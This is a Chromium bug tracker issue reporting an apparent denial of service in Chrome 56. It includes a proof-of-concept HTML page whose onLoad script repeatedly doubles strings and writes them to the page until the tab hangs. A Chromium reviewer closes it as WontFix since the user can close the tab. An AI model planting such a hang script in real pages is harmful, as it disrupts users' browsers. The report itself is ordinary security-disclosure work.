New issue
Advanced search Search tips

Issue 686019 link

Starred by 1 user
Status: WontFix
Owner: ----
Closed: Jan 2017
EstimatedDays: ----
NextAction: ----
OS: ----
Pri: ----
Type: Bug



Sign in to add a comment

Security: Google Chrome 56.0.2924.76 - Denial of Service

Reported by wassl...@gmail.com, Jan 27 2017 
Hy Google Security Team i found a Denial of Service in google chrome:

- Google Chrome Version: 56.0.2924.76 (64 bit)

- Tested on: Win7 - winxp

- POC:

Just copy the code and create a html file and paste it and open the file with Local Webserver then you can see the DOS in chrome.

Code:

<html>
<title>DoS</title>
<head>
<script>
function Dos()
 {
  
    var actiondos1 = unescape("%u4141%u4141");
    var actiondos2 = unescape("%u4242%u4242");
    var actiondos3 = unescape("%u4343%u4343");
    var actiondos4 = unescape("%u4444%u4444");
      
    for(i=0; i <= 100 ; ++i) 
 {
        actiondos1+=actiondos1;
        actiondos2+=actiondos2;
        actiondos3+=actiondos3;
        actiondos4+=actiondos4;
        document.write(actiondos1);
        document.write(actiondos2);
        document.write(actiondos3);
        document.write(actiondos4);
    }    
    document.write(actiondos1);
    document.write(actiondos2);
    document.write(actiondos3);
    document.write(actiondos4);
}
</script>
</head>
<body onLoad="Dos()">
</body>
</html>
ssssssssssssss.png
69.8 KB View Download

Comment 1 by est...@chromium.org, Jan 27 2017

Labels: -Type-Bug-Security -Restrict-View-SecurityTeam Type-Bug
Status: WontFix (was: Unconfirmed)
Thanks for the report. We don't consider denial of service bugs security issues (see https://www.chromium.org/Home/chromium-security/security-faq#TOC-Are-denial-of-service-issues-considered-security-bugs-).

In this case it looks like the repro is a long-running script that hangs the tab. Since the user can just close the tab, I don't think there's anything that Chrome should do differently.

Sign in to add a comment